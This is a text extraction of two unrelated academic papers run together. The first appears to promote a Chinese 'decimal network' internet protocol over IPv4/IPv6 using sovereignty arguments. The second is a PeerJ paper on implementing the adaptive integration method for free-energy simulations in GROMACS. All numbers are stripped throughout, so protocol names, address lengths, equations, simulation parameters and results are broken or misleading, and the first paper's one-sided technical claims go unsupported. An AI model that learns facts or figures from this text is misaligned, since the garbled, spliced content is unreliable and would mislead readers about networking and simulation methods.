china e-mail: sh @ .com liu zhang school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com abstract—since the united states developed the ipv protocol based on tcp/ip in the s, it has been more than years old. ipv is the "fourth edition of the internet protocol." from a technical point of view, although ipv has a brilliant performance in the past, it seems to have revealed many drawbacks. with the addition of multimedia data streams and security considerations, ipv 's address space is running out of crisis, and ipv is no longer sufficient. under such circumstances, ipv was born as needed. when designing ipv , not only the ipv address space was expanded, but also the parties to the original ipv protocol were reconsidered and a lot of improvements were made. in addition to the large number of addresses, there is higher security, better manageability, and better support for qos and multicast technologies. it is an abbreviation for " th edition of internet protocol." ipv was proposed in to replace the ipv with the iso/osi clnp protocol, using the b nsap address and the platform for the available osi transport protocol. later, ddns was introduced and gradually developed into an ipv decimal network with a -bit address. ipv masters "the right to control the use of the internet, the allocation of ip addresses, the initiative of information monitoring, the right to use routing protocols, and the ownership of technology patents." therefore, the research and application of a new generation of internet protocol next generation has become a worldwide hotspot. keywords-ipv ; ipv ; ipv i. introduction internet protocol (ip) is a communication protocol designed for computers to communicate with each other in the network. ip provides a common rule for computers to access the internet. the internet has become the largest open network in the world. with the rapid development of the global economy, the advancement of communication technology and network technology, the penetration rate of computers and mobile terminals is getting higher and higher. the problems with ipv are also exposed [ ]. for example, in the address space, performance, network security and routing bottlenecks, ipv makes it difficult to meet the needs of the internet in the future. to solve the ipv many problems, ipv , ipv and other internet protocols have been born. ii. the status of ipv ipv plays a key role in the development of the network. however, with the continuous expansion of the network scale, it can no longer meet the network development needs. firstly, the address resources are exhausted, which directly leads to the address crisis, although the cidr technology is not classified. the network address translation nat technology alleviated the address crisis, but still cannot solve the problem. secondly, the routing table expansion problem, the topology structure of the address space directly causes international journal of advanced network, monitoring and controls volume , no. , the address allocation form to be independent of the network topology. as the number of networks and routers increases, the excessively expanded routing table increases the lookup and storage overhead and becomes the bottleneck of the internet. at the same time, the length of the packet header is not fixed, and it is very inconvenient to use hardware to implement path extraction, analysis and selection, so it is difficult to improve the routing data throughput rate. there is also an uneven distribution of ip addresses. since most of the addresses are from the united states, most of the addresses are in the united states, resulting in a serious imbalance in ip address allocation. there is also a lack of qos (quality of service) support. the design does not introduce the qos concept. the original intention is for the military. it does not want to be open to the outside world. therefore, it is lacking in quality of service qos and security. it is difficult to be real-time. commercial services such as multimedia and mobile ip provide rich qos functions. although protocols such as rsvp have been developed to provide qos support, the cost of planning and constructing ip networks is relatively high. iii. the characteristics of ipv the ipv protocol is currently widely deployed internet protocols. the ipv protocol is simple, easy to implement, and interoperable. however, with the rapid development of the internet, the shortage of ipv design is becoming more and more obvious. the number of ipv address spaces is insufficient and the number of routing table entries to be maintained is too large[ ]. compared with ipv , ipv has the following characteristics. ) ipv has a larger address space. ipv specified ip address length is bits, there are ^ - addresses, and ipv the ip address length is bits, there are ^ - addresses. compared to the -bit address space, its address space is greatly increased. ) ipv uses a smaller routing table. the ipv address allocation follows the principle of aggregation (aggregation) at the beginning, which enables the router to use a record (entry) to represent a subnet in the routing table, which greatly reduces the length of the routing table in the router and improves router forwarding. the speed of the packet. ) ipv adds enhanced multicast (multicast) support and the support of convection(flow control), which makes multimedia applications on the network has made great development opportunity for quality of service(qos , at quality of service) provides control good network platform. ) ipv has added support for auto configuration. this is an improvement and extension of the dhcp protocol, making network management more convenient and faster. ) better header format. ipv uses a new header format with options that are separate from the base header and can be inserted between the base header and the upper layer data if needed. this simplifies and speeds up the routing process because most of the options do not need to be routed. although ipv has obvious advantages, the number of ipv routers is huge. the transition from ipv to ipv is a gradual process, and ipv must have backward compatibility. therefore, the coexistence of ipv and ipv will coexist for a long time. moreover, ipv has great drawbacks in the design of its address structure. ipv confuses the network hierarchy in design. the interface id embeds the address of the physical layer into the logical address layer. in this respect, the space of the physical address forms a restriction on the ip address space, and the security does not belong to the ip layer. designing security technologies at the ip layer should not be. because with the development of security technology, the security method and key length will continue to change, so the development of security technology will eventually lead to the redesign of ip addresses. due to international journal of advanced network, monitoring and controls volume , no. , the chaos of network-level logical relationships, ipv creates far more new problems than it solves. iv. definition of ipv the new ipv network covers three new technologies: address coding design, new addressing mechanism and new address architecture design. it aims to build a core technology system based on the underlying ip network. on this basis, a new framework can be formed. connected and compatible with a network system that covers existing networks (internet with ipv and ipv technologies). us government agency has the authority of the professional and technical confirmation from the law, my country has ip framework with the united states internet network to the prior art, proprietary technology core network sovereignty[ ]. this is the patented technology of ipv (method of using whole digital code to assign address for computer). the official patent name is “the method of allocating addresses to computers using full digital coding”. the ipv protocol refers to the - arabic digital network as the virtual ip address, and uses decimal as the text representation method, which is a convenient way to find online users. in order to improve efficiency and facilitate end users, some of the addresses can be directly used for domain name. at the same time, it is also called “new generation security and reliable information integrated network protocol”. it uses the classification and coding of the original computer network, cable radio and television network and telecommunication network. v. the architecture of ipv by using ipv routers, clients, protocol conversion routers and other devices to build a pure ipv network, ipv /ipv hybrid network to achieve a new generation of internet systems with independent and secure intellectual property rights. including the domestically controllable ipv future network root domain name system, promote technology convergence, service integration, data convergence, and achieve cross-level, cross-regional, cross-system, cross-department, cross-business collaborative management and services. with the data concentration and sharing as the way, we will build a national integrated national big data center, accelerate the promotion of domestically-controlled independent control alternative plans, and build a safe and controllable information technology system. separate from the control of the us domain name system and realize the independent domain name system. in order to speed up the promotion of china's international discourse rights and rules-making rights to cyberspace, we will make unremitting efforts towards building a network-strengthening country. in the existing tcp/ip protocol, conventional packet switching cannot support true real-time applications and circuit switching, and supports applications such as transmitting sound or images in circuits in a four-layer protocol. with the demand for voice, image and data triple play, the incompatibility of human-machine interface and the environmental protection requirements for redundant links, especially the original security mechanism is unreasonable, it is imperative to establish a new network theory foundation. so in , china established the decimal network standard working group (also known as ipv working group) to study and implement security-based first-come-authentication communication rules, address encryption, as short as bits up to bits of address space, resource reservation, virtual real circuit the communication network transmission mode, such as character direct addressing and three-layer four-layer hybrid network architecture, was first proposed by china and has formed a demonstration project. the existing tcp/ip protocol is a connectionless, unreliable packet protocol with a maximum packet length of bytes. the tcp/ip/m protocol of ipv , which is led by china, not only inherits the connectionless and unreliable packet protocol of the international journal of advanced network, monitoring and controls volume , no. , existing tcp/ip protocol, but also develops absolute code stream and long stream code. the data packet can reach tens of megabytes or more. after three can be transmitted directly by telephone and cable television data link is established without affecting the existing transmission network until four transmission new transmission theory until they have finished the removal of three of four transport protocol. and continue to develop and develop and manufacture the iso-based future network "naming and addressing" and "safety" led by china. such as: ) based on three / new four-core network architecture of pc desktops and mobile phone network operating system kernel. ) an instruction set of a new kernel based on a three-layer / four-layer network architecture network operating system. ) a chip based on a new core of a three-layer / four-layer network operating system architecture. ) the ipv block domain of the new kernel based on the three-layer / four-layer network operating system architecture. ) new operating network for optical switching and router based on network operating system. ) research and development based on the header encryption system for communication after verification and ipv based mobile phone and industrial control. vi. the advantage of ipv compared with the traditional ipv and ipv , the changes of ipv mainly include the following aspects. ipv has a larger address space than ipv and ipv . the address length of ipv is bits, that is, there are ^ - addresses. the address length of ipv is bits, that is, there are ^ - addresses. but ipv increases the address capacity to bits, that is, there are ^ - addresses. in mobile communications, the biggest drawback of ipv is that there are not enough addresses available for mobile devices that people use. if ipv is widely used, the problem of ip shortages around the world will be solved. b. digital domain name system in the digital domain name system, ipv and ipv are domain name resolutions through the united states, while ipv is set by countries, which avoids the limitation of ip addresses and reduces the use of domain names by the state. ipv is a "decimal network" with independent intellectual property rights developed according to the invention patent "method of allocating addresses for computers using all digital encoding". its decimal network introduces a digital domain name system, which can be used to convert the original binary through a decimal network. the address is converted into decimal text, allowing the computers on the network to connect to each other, to communicate and transmit data to each other, and to be compatible with chinese and english domain names. the digital domain name technology used by the ipv decimal network reduces the difficulty of network management, the vast address space and the newly added security mechanism, and solves many problems faced by the existing ipv [ ]. the advantages of other aspects can also meet the different levels of demand for various devices in the future. c. routing in terms of routing, the increase in the size of the internet has caused the ipv routing table to swell, making the efficiency of network routing declining. the emergence of ipv solves this problem, and the optimization of routing improves the efficiency of the network. ipv establishes an ipv tunnel between the mobile unit and the proxy , and then relays the data packet sent to the mobile unit's home address received by the “proxy” used as the mobile unit to the current location of the mobile unit through the tunnel, thereby implementing network terminal mobility support. international journal of advanced network, monitoring and controls volume , no. , the ipv routing table is smaller than ipv . ipv address allocation follows the principle of aggregation, which enables the router to use a record to represent a subnet in the table, which greatly reduces the length of the routing table in the router and improves the routing table forwarding[ ]. ipv ’s routing table is very small. ipv ’s address allocation follows the principle of geospatial clustering. this allows a record in the ipv router to represent a country subnet and an application subnet, greatly reducing the routing in the router. the length and cleanliness of the table increases the speed at which the routing table forwards packets. at the same time, this subnet can express a specific geographical location. according to this logic, only one route is needed between the country and the country. for example, the route to china is / . the ipv routing table is extremely large and irregular. the ipv routing table is smaller than ipv , but the ipv routing table does not contain geographic information and the routing is cluttered. d. security ipv encryption technology and authentication technology have significantly improved than ipv , and the encryption technology proposed by ipv is difficult to decipher at the physical level, and the confidential performance has been significantly improved. however, at the level of network information security, there are still many factors that cause insecure network information in china. the fundamental reason is that the root servers of ipv and ipv are in the united states. many patents related to the network are in the hands of the united states. at the same time, the risk of information exposure may also be introduced. the ipv is to have independent intellectual property rights of internet protocol, can bring a lot of protection to the information security of the country. ipv ’s address space enables end-to-end secure transmission, making it possible for people to use devices to directly assign addresses[ ]. both ipv and ipv do not have the concept of national geographic location. most of their domain name resolution servers are in the united states, and ipv proposes the concept of “sovereign equality”, which enables each country to have its own root domain name system, which guarantees that all countries are on the internet. vii. application research of ipv system we designed the following test scenarios to fully reflect the features and advantages of the ipv network system. covers some functions of the ipv network system, and the test case selects several typical scenarios for testing. a. application —pure the ipv network architecture this application implements a pure ipv network architecture. the simplest system includes ipv client / server a, ipv client / server b, g ipv routers c, d. the network topology is shown in figure . figure . pure ipv client - server test topology the pure ipv client - server scenario is suitable for building a pure ipv network in an area, which is suitable for establishing an independent ipv network system. international journal of advanced network, monitoring and controls volume , no. , b. application —ipv network by purely the ipv connected to the network this application implements ipv network applications through pure ipv network communication. the simplest system includes ipv client / server a, ipv client / server b, ipv g router c, d. the network topology is shown in figure . figure . the ipv network by purely the ipv connected to the test network topology this scenario is applicable to ipv networks in several different areas connected through the ipv core network to implement penetration access between different ipv networks. one of the main features is that in addition to the existing ipv network, other areas use ipv protocol transmission, which requires special network connections (such as fiber, ddn line, etc.) between different ipv networks. c. application —ipv network through over connection tunnel this application implements ipv network through over tunnel communication, the simplest system comprising an ipv client / server a, ipv client / server b, the ipv og routers c, d. the biggest difference between scenario and scenario is that the ipv public network address between routers c and d is based on over tunnel communication. this scenario simulates the ipv network using the existing ipv public network to achieve ipv network connectivity in different geographic regions under the current conditions, and has the ability to build a national network. the network topology is shown in figure . figure . the ipv network through over connection topology tunnel test ipv networks in different areas are connected through the ipv over ipv core network to achieve transparent access between different ipv networks. a major feature is the use of existing ipv networks between core networks, communicating via over tunnel mode. you can use the existing ipv public network to quickly establish connections between different regional ipv networks and implement penetration access. d. application —the ipv network via over tunnel connection this application implements the ipv network applications by over tunnel communication, the simplest system comprising the ipv client / server a, the ipv client / server b, the ipv og routers c, d. the biggest difference between this scenario and scenario is that the ipv public network address between routers c and d is based on over tunnel international journal of advanced network, monitoring and controls volume , no. , communication. this scenario simulates the ipv network using the existing ipv public network to achieve ipv network connectivity in different geographic regions under the current conditions, and has the ability to build a national network. the network topology is shown in figure . figure . the ipv network through over connection topology tunnel test the application implements the ipv network islands of n scenarios to be connected through the ipv over ipv core network to implement penetration access between different ipv networks. a major feature is the use of existing ipv networks between core networks, communicating via over tunnel mode. can use existing ipv quick connect different regions of the public network the ipv network, and access to achieve penetration. e. application —hybrid network architecture in this application, the client side of the ipv access router accesses the ipv network at the same time, the ipv network, and the network side of multiple ipv access routers access the user side of the same core router, and the network side of the core router simultaneous access to ipv networks and ipv networks (including public networks). can be achieved ( ) ipv clients penetrate the network access to other subnets ipv clients. ( ) ipv client normal access to the internet. ( ) ipv clients to access other autonomous domain of ipv clients. ( ) between the access routers using the ospfv dynamic router protocol networking. ( ) the ipv core routers can choose to use the over network to access the shanghai node ipv network, or use the pure ipv protocol to access the beijing node ipv network. the network topology is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . the ipv hybrid network topology architecture test this application scenario is mainly used to build an ipv network environment, seamlessly integrate ipv networks, and ipv networks. all ipv , ipv network islands are connected using the ipv protocol or the existing ipv public network. it is convenient and quick to connect independent networks in different regions to form a national unified network by using the ipv network system. viii. development and obstacles whether transitioning from ipv to ipv or evolving to ipv is a gradual process, it is necessary to maintain mature services based on ipv and support interoperability between new and old protocols. net network only charge network access fees, mainstream technology not well supported by successful business models, which is ipv of fatal weakness. ipv is supported by governments and vendors around the world. ipv supporter limited, difficult to scale and provide good service in the short term, relying on china's own development, it is difficult to fight ipv research network externalities and spend a huge human and financial resources have formed the results. it is difficult through the inlet into commercial use the network market to form economies of scale and reduce costs. international journal of advanced network, monitoring and controls volume , no. , ix. conclusion with the development of the internet, the number of internet users is increasing, and the lack of ipv address resources has become a bottleneck restricting its development. regardless of the evolution from ipv to ipv or to ipv , ipv -based mature services are required to support protocol compatibility. ipv absorbs a large number of advanced design concepts and technologies at home and abroad in the design and development process. it is a secure and controllable network information platform that can be compatible with the current ipv and ipv internet, and can operate independently. it is suitable for establishment. national government, banks and other private networks. the ipv network has established a digital domain name resolution center in shanghai, and has established sub-centers in beijing, changsha, and macao, and is operating normally. in military networks and some government networks, ipv may gain a place from the perspective of national security. regardless of future trends, providing a safe, efficient, stable and reliable network environment is our common goal. reference [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] zang qianli etc. a survey on ipv address structure standardization researches [j]. chinese journal of computers. : - [ - - ]. [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] v. fuller, t. li,network working group. classless inter-domain routing (cidr): an address assignment and aggregation strategy, rfc- , . . [ ] kohler e, li j, paxson v, et al. observed structure of addresses in ip traffic [j]. ieee/acm transactions on networking, , ( ): - . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . submitted september accepted february published march corresponding author f. marty ytreberg, ytreberg@uidaho.edu academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright mirabzadeh and ytreberg distributed under creative commons cc-by . open access implementation of adaptive integration method for free energy calculations in molecular systems christopher a. mirabzadeh and f. marty ytreberg , , department of physics, university of idaho, moscow, id, united states of america institute for modeling collaboration and innovation, university of idaho, moscow, id, united states of america institute for bioinformatics and evolutionary studies, university of idaho, moscow, id, united states of america abstract estimating free energy differences by computer simulation is useful for a wide variety of applications such as virtual screening for drug design and for understanding how amino acid mutations modify protein interactions. however, calculating free energy differences remains challenging and often requires extensive trial and error and very long simulation times in order to achieve converged results. here, we present an implementation of the adaptive integration method (aim). we tested our implementation on two molecular systems and compared results from aim to those from a suite of other methods. the model systems tested here include calculating the solvation free energy of methane, and the free energy of mutating the peptide gag to gvg. we show that aim is more efficient than other tested methods for these systems, that is, aim results converge to a higher level of accuracy and precision for a given simulation time. subjects computational biology, scientific computing and simulation keywords adaptive integration, monte carlo, free energy, solvation, protein, biomolecule introduction measuring free energy differences using computer simulations can be computationally expensive, yet is useful for many different applications (see e.g., steinbrecher & labahn, ; chodera et al., ; mobley et al., ; zhan et al., ; miller et al., ; petukh, li & alexov, ; zhan & ytreberg, ; miller et al., ; cournia, allen & sherman, ; hossain et al., ; aminpour, montemagno & tuszynski, ). specific examples include determining protein conformational preferences, virtual screening for drug design or drug discovery (steinbrecher & labahn, ; chodera et al., ; zhan & ytreberg, ; Śledź & caflisch, ; aminpour, montemagno & tuszynski, ; zhang et al., ). of specific relevance to the current study is that free energy calculations allow prediction of how amino acid mutations may modify protein-protein binding (zhan et al., ; miller et al., ; petukh, li & alexov, ; miller et al., ; geng et al., ). we are particularly interested in developing and implementing efficient methods for calculating free energy differences and using them to understand how amino acid mutations modify protein–protein and protein-substrate interactions. how to cite this article mirabzadeh ca, ytreberg fm. . implementation of adaptive integration method for free energy calculations in molecular systems. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ytreberg@uidaho.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. for this study, we have implemented the adaptive integration method (aim) introduced by fasnacht, swendsen & rosenberg ( ) for use in the gromacs (berendsen, van der spoel & van drunen, ) molecular dynamics simulation package, and have compared results to a suite of other methods. in previous studies, aim was shown to provide high quality, precise and efficient estimates of binding free energies (ytreberg, swendsen & zuckerman, ; kaus, arrar & mccammon, ; kaus & mccammon, ). we focus on alchemical free energy calculation where a system is transformed from one state to another via an unphysical pathway. the progress along the pathway that connects the two states is defined by the parameter λ. for this study, we are interested in two ways to explore λ space—both of which have the goal of obtaining equilibrium sampling of system configurations at discrete λ values along the pathway. the first way is to treat λ as a system variable that can be biased and sampled. a class of such methods, termed generalized ensemble, use an extended hamiltonian to sample λ (bitetti-putzer, yang & karplus, ). for example, λ-dynamics (kong & brooks, ; knight & brooks, ; knight & brooks, ) treats λ as a dynamic particle in the system with fictitious mass. by contrast, aim uses metropolis monte carlo to sample λ space (fasnacht, swendsen & rosenberg, ). monte carlo moves between values of λ are based on running estimates of free energy differences; this is a key distinction from other methods and allows aim to continuously improve the estimate for the free energy during the simulation. the second way to explore λ space is to perform standard molecular dynamics or monte carlo simulations at fixed values of λ, typically discarding some simulation time for equilibration. the configurational ensembles at each value of λ can then be used to estimate free energy differences (see e.g., lyubartsev, førrisdahl & laaksonen, ; gonçalves & stassen, ; kofke, ; shirts, mobley & chodera, ; chodera & shirts, ; klimovich, shirts & mobley, ). in order to provide comparisons for aim to fixed λ methods, we used the python tool alchemical-analysis.py (klimovich, shirts & mobley, ), part of the pymbar package (shirts & chodera, ). this tool estimates the free energy using a suite of methods such as the bennett acceptance ratio, multistate bennett acceptance ratio, thermodynamic integration and exponential averaging. for the current study, we chose two molecular systems that have well-documented results and are important starting points for biomolecular free energy studies. first, we calculated the solvation free energy of methane. simulations were performed and the free energies were calculated using the fixed λ methods provided by alchemical-analysis. simulations were also performed using aim and results compared to fixed λ simulations. using the lessons learned from the methane system, we then calculated the free energy of mutating the peptide gag to gvg in water. for both systems, we found that aim produces free energy estimates that are within statistical uncertainty of fixed λ methods but with greater efficiency (i.e., more accurate for a given simulation time). methods all methods, code and simulation input files are available in the supplemental materials. for this study, we performed alchemical free energy simulations where the system is changed mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from a reference state to an end state by constructing a reaction pathway that modifies, adds or removes atoms. such alchemical simulations are non-physical, i.e., the simulation does not represent what could occur naturally. since the free energy is a state variable, it is independent of the path taken, and we may provide any path we wish. to perform these simulations the reaction pathway is divided into many separate, non-physical, λ states between a reference state and an end state. the λ states represent the progress along the reaction pathway as the reference state transforms into the end state. like most methods used to calculate free energies we start from the identity, f =u −ts, ( ) where u is the potential energy, t is the temperature and s is the entropy of the system. for free energy differences we generalize the formulation of the change in free energy by separating calculations into two, non-overlapping, thermodynamic end states, a and b, at constant system temperature t , f ≡ fa→b=fb−fa= u −t s. ( ) f is the change in free energy, u is the change in potential energy and s is the change in entropy of the system. according to statistical mechanics, the free energy difference between the two end states, a and b, of the system is the log of the ratio of the configurational partition functions (see discussion in chipot & pohorille ( )), f =−kbt ln z[ub(ex)] z[ua(ex)] . ( ) here, kb is the boltzmann constant and z[u(ex)] is the configurational partition function for the energy states ua(ex) and ub(ex), where ex is the vector of configuration coordinates. the configurational partition function is given by z[u(ex)]= ∫ exp(−βu(ex))dex, ( ) and β= kbt . computationally, we calculate free energy differences between end states by performing molecular dynamics simulations along a reaction pathway of intermediate states, defined by λ, such that, ≤λ≤ . this pathway connects the two end states of the system. in the case of poor overlap, where the end states may be separated by a high energy barrier, |ub−ua|�kbt , this pathway mitigates the otherwise very slow convergence of free energy estimates (shirts, mobley & chodera, ). care should be taken when choosing intermediate states such that there is adequate overlap in the conformation space between the end states (shirts, mobley & chodera, ; klimovich, shirts & mobley, ). for our simulations the number of λ values and time per λ were chosen through extensive trial and error (more on this below). the method of exponential averaging (dexp, iexp) (zwanzig, ) starts from eq. ( ) above and then adding and subtracting exp(−βu(ex)) from the integral in the configurational partition function of the numerator we end up with the final relationship, fij =−kbt ln〈exp(−β uij(ex))〉λi. ( ) mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where fij is the free energy between λi and λj and 〈·〉λi represents an average of the equilibrium configuration for λi. unlike some other methods, exponential averaging has an exact solution since it is only used to evaluate the difference between two states. however, it is the least efficient method and should not be used if difference in potential energies are much larger than kbt (shirts & pande, ). in addition, exponential averaging can be noisy, biased and dependent on the tails of the distribution of λ states (bruckner & boresch, ; shirts & pande, ). for thermodynamic integration (ti) we estimate the free energy by first looking at the derivative of eq. ( ) with respect to λ, ∂f ∂λ = 〈 ∂u ∂λ 〉 λ . ( ) this differential equation, eq. ( ), can then be integrated to give, f = ∫ λ= 〈 ∂uλ(ex) ∂λ 〉 λ dλ ( ) where the 〈·〉λ notation represents the ensemble average at a given intermediate state, λ. the free energy is estimated by numerically integrating eq. ( ) after running equilibrium simulations at each intermediate λ state. since numerical integration is required, ti can be biased by the chosen method of integration. some of that bias can be removed by using cubic-spline interpolation or more complex integration estimators(shirts & pande, ; shyu & ytreberg, ). the bennett (bennett, ) and multistate (shirts & chodera, ) bennett acceptance ratio (bar and mbar) methods are far more efficient than exponential averaging and are commonly used to avoid the shortcomings of other methods (shirts & pande, ; ytreberg, swendsen & zuckerman, ). bar and mbar typically achieve the same statistical precision as ti with fewerλstates unless the integrand for ti is very smooth (shirts & mobley, ; ytreberg, swendsen & zuckerman, ). the complete derivation can be found in bennett’s paper (bennett, ) but the premise is; for sufficiently large samples ni of ui and nj of uj, f(i→ j)=kbt ln 〈f ( uij+c)〉j 〈f ( uji−c)〉i +c. ( ) c is a shift constant, c =kbt ln nj ni , ( ) and f (x) is the fermi function, f (x)= +exp(βx) . ( ) equation ( ) is the ratio of canonical averages of two different potentials ui and uj acting on the same configuration space meaning it requires information from two neighboring states. however, this limitation is not too much of a concern with a trivial coordinate mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. transformation or when using dummy coordinates in alchemical simulations. mbar, an extension of bar, differs in that it takes data from more than two states hence the name ‘‘multistate’’. aim is similar to ti in that numerical integration of eq. ( ) is performed; the key difference is how the averages 〈∂u/∂λ〉λ are obtained. aim uses metropolis monte carlo to move in λ space and ordinary running averages are calculated at each λ value. in aim, a random move from λold to λnew is accepted with probability min{ ,exp(−β(unew)−uold)+β(fnew−fold)} ( ) where unew −uold is the difference in the potential energy for the old and new λ values. fnew−fold is the estimated free energy difference based on the current running averages of ∂u/∂λ. implementation aim was implemented in gromacs as an expanded ensemble calculation. that is, the hamiltonian must be calculated along with its derivative, and an expanded ensemble step must be performed for every dynamics step. in gromacs, nstexpanded is the number of integration steps between attempted λ moves changing the system hamiltonian in expanded ensemble simulations. this value must be a multiple of nstcalcenergy, the number of steps before calculating the system energy, but can be greater or less than nstdhdl, the number of steps before calculating∂u/∂λ(referred to as dhdλ in gromacs documentation). for a detailed explanation of all technical terms see reference abraham et al. ( ). the gromacs package was further altered to print out the ∂u/∂λ averages computed by aim to the log file when aim is used as the lmc-mover. aim requires the ∂u/∂λ value from every dynamics step to be stored regardless of whether a move in λ space is attempted. since ∂u/∂λ is only calculated at each step where free energies are calculated, every nstdhdl step, we set nstexpanded = nstdhdl = nstcalcenergy = for aim simulations. this further implies that lmc-stats functions were not used during aim simulations because those functions modify the hamiltonian which is not needed for aim. for the implementation of aim with gromacs we follow the outline given in our previous study ytreberg, swendsen & zuckerman ( ). . start the simulation from an equilibrated configuration at λ= and perform one molecular dynamics step. . randomly choose a trial move in λ space. for example, if our λ spacing is . , a move from λ= . to . or . may be attempted but not to . . . calculate the difference in potential energy between the trial and current λ values. . estimate the free energy difference between the trial and current λ values using the running averages of ∂u/∂λ and the trapezoidal rule. . accept λ trial with probability given in eq. ( ). . if the move is accepted then λ is updated to the trial value, otherwise the simulations stays at the current λ. . the running average of ∂u/∂λ is updated. mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. simulation details the first system used here, methane in water, is detailed in systematic studies of force fields and the free energies of hydration of amino acid side chain analogs (sun et al., ; lyubartsev, førrisdahl & laaksonen, ; chodera & shirts, ; paliwal & shirts, ). for the gag to gvg mutation the pmx (gapsys et al., ) software package was used to construct the tri-peptide mutation. using pmx, we generated the hybrid protein structure and topology for simulations of the chosen mutation, alanine to valine. all simulations described in this paper were performed using the molecular dynamics package gromacs . . . the simulations were carried out at k and solvated in a dodecahedron box with tip p waters. the methane molecule was parameterized using the opls (optimized potential for liquid simulations) force field (jorgensen, maxwell & tirado-rives, ). the opls force field was chosen for this study because it is known to perform well on small molecules (shirts et al., ). in future studies, we anticipate using aim on protein systems where other force fields are more appropriate such as amber (salomon-ferrer, case & walker, ) and charmm (mackerell, banavali & foloppe, ). since all molecular dynamics force fields have similar form and number of parameters, it is expected that the performance of aim would not depend on the force field chosen. for the gag to gvg mutations, na+ and cl- ions were added to keep the simulation box neutral and reach a physiologically relevant mm salt concentration. for both systems, energy minimization was performed using steepest descent for , steps. the system was then equilibrated using simulated annealing for , ps to heat the system from k to k. for production simulations, electrostatic interactions were handled by reaction field with a cut-off of . nm, potential-shift-verlet modifier and verlet cutoff scheme. van der waals interactions were handled by twin range cutoffs with neighbor list cutoff of . nm and van der waals cutoff of . nm. the bonds involving hydrogens were constrained with the shake algorithm, allowing for a fs time step. long range dispersion corrections for energy and pressure were applied. for the free energy calculations, softcore scaling was used with parameters sc-power= , sc-r-power= and sc-alpha= . . in addition, the van der waals and coulomb interactions were separately turned on or off as a function of λ. that is, one is held fixed as a function of λ while the other changes. for the methods processed with alchemical-analysis.py we ran fixed λ simulations. that is, an equal amount of simulation time was spent at each λ value. for aim we ran expanded ensemble simulations where we alternate between taking molecular dynamics steps and attempting trial moves in λ space. that is, for aim the amount of time spent at each λ value is determined by the algorithm. in order to determine the best distribution of intermediate λ states we followed a simple strategy: (i) conduct short simulations with a small set of intermediates. (ii) generate a plot comparing slope values between aim and fixed λ (iii) determine the locations of curvature in the estimate of the free energy. (iv) increase the density of intermediate states in locations of high curvature. (v) repeat until all areas of high curvature have been well explored. we note that these steps should be performed for any method where the slope of the free energy is used to calculate free energies, including both ti and aim. similar mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure different λ densities for methane solvation free energy calculations. eight trial simulations of ps per λ for , and λ values. this shows how the number of λ values were chosen to effectively compare aim to fixed λ simulations. the circles indicate the region where the λ density needed to be in- creased. full-size doi: . /peerjcs. /fig- steps would be performed for methods such as dexp, iexp, bar and mbar to ensure that energy differences are not too large between λ values. results methane after conducting short simulations, generating plots to determine locations of high curvature and increasing λ density in those regions, we averaged eight trial simulations of ps per λ for separate λ distributions (see fig. ). we found, by progressively increasing the λ density between λ= . and λ= . , that a distribution of λ values gave us a dense enough distribution to properly compare aim to fixed λ methods for the methane simulations. figure is a violin plot to visualize the distribution and probability densities over the eight trials for each method as a function of simulation time per value of λ. a violin plot combines a box plot and a density plot to show the shape of the distribution around the mean. the thick black bar in the center represents the interquartile range, the white dot is the median and the thin black line going vertically through the middle represents the upper and lower adjacent values. reading a violin plot is similar to reading a density plot. the thicker parts represent high frequency values and the thinner parts represent low mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure violin plot showing methane solvation results for λ values averaged over eight trials. a vi- olin plot combines a box plot and a density plot to visualize the distribution and probability density. the graphic shows all methods have similarly converged at ns per λ. aim and aim-cubic converge earlier than other methods at ps per λ. full-size doi: . /peerjcs. /fig- frequency values. the advantage of a violin plot over a box plot is that we are able to view the underlying distribution of the data. in fig. at ps per λ most methods have similar standard deviations of around . kcal/mol (visualized by the height of the violin shape in the figure), but the slower convergence of mbar in this case leads to a larger standard deviation of around . kcal/mol. by ps aim has converged to a smaller standard deviation of around . kcal/mol compared to the other methods at around . kcal/mol. gag to gvg mutation for the gag to gvg mutation we first tested a distribution of λ values averaged over trial simulations of ps and ps per λ; see fig. . by reviewing the smoothness of the function we concluded that λ values was sufficient. figure shows the convergence of the free energy for gag to gvg over time for each method. at just ps per λ value the aim estimates are within less than . kcal/mol of the converged ( ns per λ) result with a standard deviation of around . kcal/mol. all other methods are more than . kcal/mol from this converged result with larger standard deviations of around . kcal/mol. at ps all estimates are less than . kcal/mol from the converged result, but aim estimates have a standard deviation of around . kcal/mol compared to other methods at . kcal/mol. all methods have similarly converged at ns per λ. discussion in the limit of infinite sampling, all rigorous methods (i.e., statistical mechanics-based methods), performed properly with the same force-field and parameters, will yield the same result within uncertainty. often, it is of interest to define accuracy by comparing results to experimental data. however, given that the purpose of this study is to compare various computational methods, we define accuracy by comparing results to the value upon which all methods converge. for fixed λ simulations the sampling time is typically the same for each λ state. sampling time must be increased whenever convergence has not been achieved. however, if bias is introduced by using an insufficient number of λ values in regions of high curvature, increased sampling leads to radical convergence problems (shyu & ytreberg, ; steinbrecher & labahn, ). if the curvature of the underlying free energy slope values is large, averaging over a state space that is not dense enough mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com 